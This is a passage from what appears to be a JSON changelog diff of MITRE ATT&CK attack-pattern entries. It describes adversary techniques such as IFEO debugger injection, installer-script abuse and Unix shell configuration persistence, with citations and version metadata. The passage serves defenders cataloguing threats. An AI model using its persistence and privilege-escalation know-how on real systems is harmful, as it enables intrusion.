+                            "description": "Gary Golomb and Tory Kei. (n.d.). Threat Hunting Series: Detecting Command & Control in the Cloud. Retrieved May 27, 2022.",
+                            "url": "https://awakesecurity.com/blog/threat-hunting-series-detecting-command-control-in-the-cloud/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Francesco Bigarella"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.705000+00:00\", \"old_value\": \"2025-10-24 17:49:06.502000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0846: Detection of Cloud Accounts"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--65013dd2-bc61-43e3-afb5-a14c4fa7437a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-01 01:09:53.217000+00:00",
+                    "modified": "2026-05-12 15:12:00.636000+00:00",
+                    "name": "Email Accounts",
+                    "description": "Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Establishing email accounts may also allow adversaries to abuse free services \u2013 such as trial periods \u2013 to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for follow-on purposes.(Citation: Free Trial PurpleUrchin)\n\nAdversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)\n\nTo decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1585/002",
+                            "external_id": "T1585.002"
+                        },
+                        {
+                            "source_name": "Trend Micro R980 2016",
+                            "description": "Antazo, F. and Yambao, M. (2016, August 10). R980 Ransomware Found Abusing Disposable Email Address Service. Retrieved October 13, 2020.",
+                            "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/r980-ransomware-disposable-email-service/"
+                        },
+                        {
+                            "source_name": "Free Trial PurpleUrchin",
+                            "description": "Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.",
+                            "url": "https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/"
+                        },
+                        {
+                            "source_name": "Mandiant APT1",
+                            "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.",
+                            "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.636000+00:00\", \"old_value\": \"2025-10-24 17:48:52.378000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0835: Detection of Email Accounts"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b1ccd744-3f78-4a0e-9bb2-2002057f7928",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-10-01 01:08:41.124000+00:00",
+                    "modified": "2026-05-12 15:12:00.708000+00:00",
+                    "name": "Social Media Accounts",
+                    "description": "Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona  on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. \n\nOnce a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "resource-development"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1585/001",
+                            "external_id": "T1585.001"
+                        },
+                        {
+                            "source_name": "NEWSCASTER2014",
+                            "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.",
+                            "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation"
+                        },
+                        {
+                            "source_name": "BlackHatRobinSage",
+                            "description": "Ryan, T. (2010). \u201cGetting In Bed with Robin Sage.\u201d. Retrieved March 6, 2017.",
+                            "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.1",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.708000+00:00\", \"old_value\": \"2025-10-24 17:49:14.364000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.1",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0851: Detection of Social Media Accounts"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--6d4a7fb3-5a24-42be-ae61-6728a2b581f6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-24 15:05:58.384000+00:00",
+                    "modified": "2026-05-12 15:12:00.640000+00:00",
+                    "name": "Image File Execution Options Injection",
+                    "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application\u2019s IFEO will be prepended to the application\u2019s name, effectively launching the new process under the debugger (e.g., <code>C:\\dbg\\ntsd.exe -g  notepad.exe</code>).(Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can be set directly via the Registry or in Global Flags via the GFlags tool.(Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\\SOFTWARE{\\Wow6432Node}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\<executable></code> where <code>&lt;executable&gt;</code> is the binary on which the debugger is attached.(Citation: Microsoft Dev Blog IFEO Mar 2010)\n\nIFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process).(Citation: Microsoft Silent Process Exit NOV 2017)(Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\</code>.(Citation: Microsoft Silent Process Exit NOV 2017)(Citation: Oddvar Moe IFEO APR 2018)\n\nSimilar to [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures \"cmd.exe,\" or another program that provides backdoor access, as a \"debugger\" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the \"debugger\" program to be executed with SYSTEM privileges.(Citation: Tilbury 2014)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer.(Citation: Elastic Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.\n\nMalware may also use IFEO to impair defenses by registering invalid debuggers that redirect and effectively disable various system and security applications.(Citation: FSecure Hupigon)(Citation: Symantec Ushedix June 2008)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1546/012",
+                            "external_id": "T1546.012"
+                        },
+                        {
+                            "source_name": "FSecure Hupigon",
+                            "description": "FSecure. (n.d.). Backdoor - W32/Hupigon.EMV - Threat Description. Retrieved December 18, 2017.",
+                            "url": "https://www.f-secure.com/v-descs/backdoor_w32_hupigon_emv.shtml"
+                        },
+                        {
+                            "source_name": "Elastic Process Injection July 2017",
+                            "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.",
+                            "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
+                        },
+                        {
+                            "source_name": "Microsoft Silent Process Exit NOV 2017",
+                            "description": "Marshall, D. & Griffin, S. (2017, November 28). Monitoring Silent Process Exit. Retrieved June 27, 2018.",
+                            "url": "https://docs.microsoft.com/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit"
+                        },
+                        {
+                            "source_name": "Microsoft GFlags Mar 2017",
+                            "description": "Microsoft. (2017, May 23). GFlags Overview. Retrieved December 18, 2017.",
+                            "url": "https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview"
+                        },
+                        {
+                            "source_name": "Oddvar Moe IFEO APR 2018",
+                            "description": "Moe, O. (2018, April 10). Persistence using GlobalFlags in Image File Execution Options - Hidden from Autoruns.exe. Retrieved June 27, 2018.",
+                            "url": "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/"
+                        },
+                        {
+                            "source_name": "Microsoft Dev Blog IFEO Mar 2010",
+                            "description": "Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). Retrieved December 18, 2017.",
+                            "url": "https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/"
+                        },
+                        {
+                            "source_name": "Symantec Ushedix June 2008",
+                            "description": "Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December 18, 2017.",
+                            "url": "https://www.symantec.com/security_response/writeup.jsp?docid=2008-062807-2501-99&tabid=2"
+                        },
+                        {
+                            "source_name": "Tilbury 2014",
+                            "description": "Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20200730053039/https://www.crowdstrike.com/blog/registry-analysis-with-crowdresponse/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Oddvar Moe, @oddvarmoe"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.640000+00:00\", \"old_value\": \"2026-04-16 18:54:42.949000+00:00\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0422: Detection Strategy for IFEO Injection on Windows"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2022-09-27 18:02:16.026000+00:00",
+                    "modified": "2026-05-12 15:12:00.721000+00:00",
+                    "name": "Installer Packages",
+                    "description": "Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)\n\nUsing legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti)(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)\n\nDepending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed.\n\nFor Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. These installation routines may also include instructions to perform additional actions that may be abused by adversaries.(Citation: Microsoft Installation Procedures)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1546/016",
+                            "external_id": "T1546.016"
+                        },
+                        {
+                            "source_name": "Application Bundle Manipulation Brandon Dalton",
+                            "description": "Brandon Dalton. (2022, August 9). A bundle of nerves: Tweaking macOS security controls to thwart application bundle manipulation. Retrieved September 27, 2022.",
+                            "url": "https://redcanary.com/blog/mac-application-bundles/"
+                        },
+                        {
+                            "source_name": "Debian Manual Maintainer Scripts",
+                            "description": "Debian Policy Manual v4.6.1.1. (2022, August 14). Package maintainer scripts and installation procedure. Retrieved September 27, 2022.",
+                            "url": "https://www.debian.org/doc/debian-policy/ch-maintainerscripts.html#s-mscriptsinstact"
+                        },
+                        {
+                            "source_name": "Windows AppleJeus GReAT",
+                            "description": "Global Research & Analysis Team, Kaspersky Lab (GReAT). (2018, August 23). Operation AppleJeus: Lazarus hits cryptocurrency exchange with fake installer and macOS malware. Retrieved September 27, 2022.",
+                            "url": "https://securelist.com/operation-applejeus/87553/"
+                        },
+                        {
+                            "source_name": "Microsoft Installation Procedures",
+                            "description": "Microsoft. (2021, January 7). Installation Procedure Tables Group. Retrieved December 27, 2023.",
+                            "url": "https://learn.microsoft.com/windows/win32/msi/installation-procedure-tables-group"
+                        },
+                        {
+                            "source_name": "wardle evilquest parti",
+                            "description": "Patrick Wardle. (2020, June 29). OSX.EvilQuest Uncovered part i: infection, persistence, and more!. Retrieved March 18, 2021.",
+                            "url": "https://objective-see.com/blog/blog_0x59.html"
+                        },
+                        {
+                            "source_name": "Installer Package Scripting Rich Trouton",
+                            "description": "Rich Trouton. (2019, August 9). Installer Package Scripting: Making your deployments easier, one ! at a time. Retrieved September 27, 2022.",
+                            "url": "https://cpb-us-e1.wpmucdn.com/sites.psu.edu/dist/4/24696/files/2019/07/psumac2019-345-Installer-Package-Scripting-Making-your-deployments-easier-one-at-a-time.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Brandon Dalton @PartyD0lphin",
+                        "Rodchenko Aleksandr"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.721000+00:00\", \"old_value\": \"2025-04-15 19:59:13.167000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.2",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0330: Detection Strategy for T1546.016 - Event Triggered Execution via Installer Packages"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-01-24 14:13:45.936000+00:00",
+                    "modified": "2026-05-12 15:12:00.709000+00:00",
+                    "name": "Unix Shell Configuration Modification",
+                    "description": "Adversaries may establish persistence through executing malicious commands triggered by a user\u2019s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (<code>/etc</code>) and the user\u2019s home directory (<code>~/</code>) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user\u2019s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \n\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the <code>/etc/profile</code> and <code>/etc/profile.d</code> files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into <code>~/.bash_profile</code>, <code>~/.bash_login</code>, or <code>~/.profile</code> which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used <code>~/.bash_profile</code> to ensure execution. Adversaries have also leveraged the <code>~/.bashrc</code> file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the <code>~/.bash_logout</code> file to execute malicious commands at the end of a session. \n\nFor macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using <code>/etc/profile</code>, <code>/etc/zshenv</code>, <code>/etc/zprofile</code>, and <code>/etc/zlogin</code>.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with <code>~/.zprofile</code> and <code>~/.zlogin</code>. The interactive shell uses the <code>~/.zshrc</code> to configure the user environment. Upon exiting, <code>/etc/zlogout</code> and <code>~/.zlogout</code> are executed. For legacy programs, macOS executes <code>/etc/bashrc</code> on startup.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "privilege-escalation"
+                        },
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "persistence"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1546/004",
+                            "external_id": "T1546.004"
+                        },
+                        {
+                            "source_name": "anomali-linux-rabbit",
+                            "description": "Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved December 17, 2020.",
+                            "url": "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat"
+                        },
+                        {
+                            "source_name": "anomali-rocke-tactics",
+                            "description": "Anomali Threat Research. (2019, October 15). Illicit Cryptomining Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved December 17, 2020.",
+                            "url": "https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect"
+                        },
+                        {
+                            "source_name": "Linux manual bash invocation",
+                            "description": "ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.",
+                            "url": "https://wiki.archlinux.org/index.php/Bash#Invocation"
+                        },
+                        {
+                            "source_name": "ScriptingOSX zsh",
+                            "description": "Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration Files. Retrieved February 25, 2021.",
+                            "url": "https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/"
+                        },
+                        {
+                            "source_name": "bencane blog bashrc",
+                            "description": "Benjamin Cane. (2013, September 16). Understanding a little more about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.",
+                            "url": "https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/"
+                        },
+                        {
+                            "source_name": "macOS MS office sandbox escape",
+                            "description": "Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump. Retrieved August 20, 2021.",
+                            "url": "https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a"
+                        },
+                        {
+                            "source_name": "Magento",
+                            "description": "Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection Vector. Retrieved December 17, 2020.",
+                            "url": "https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html"
+                        },
+                        {
+                            "source_name": "Tsunami",
+                            "description": "Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware Targets DVRs, Forms Botnet. Retrieved December 17, 2020.",
+                            "url": "https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/"
+                        },
+                        {
+                            "source_name": "PersistentJXA_leopitt",
+                            "description": "Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell for macOS. Retrieved January 11, 2021.",
+                            "url": "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5"
+                        },
+                        {
+                            "source_name": "code_persistence_zsh",
+                            "description": "Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js. Retrieved January 11, 2021.",
+                            "url": "https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js"
+                        },
+                        {
+                            "source_name": "ESF_filemonitor",
+                            "description": "Patrick Wardle. (2019, September 17). Writing a File Monitor with Apple's Endpoint Security Framework. Retrieved December 17, 2020.",
+                            "url": "https://objective-see.com/blog/blog_0x48.html"
+                        },
+                        {
+                            "source_name": "intezer-kaiji-malware",
+                            "description": "Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware turning to Golang. Retrieved December 17, 2020.",
+                            "url": "https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Robert Wilson",
+                        "Tony Lambert, Red Canary"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS"
+                    ],
+                    "x_mitre_version": "2.2",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.709000+00:00\", \"old_value\": \"2025-10-24 17:49:15.960000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.2",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0020: Detect Shell Configuration Modification for Persistence via Event-Triggered Execution"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2019-01-31 02:10:08.261000+00:00",
+                    "modified": "2026-05-12 15:12:00.685000+00:00",
+                    "name": "Execution Guardrails",
+                    "description": "Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary\u2019s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)\n\nGuardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.\n\nAdversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: 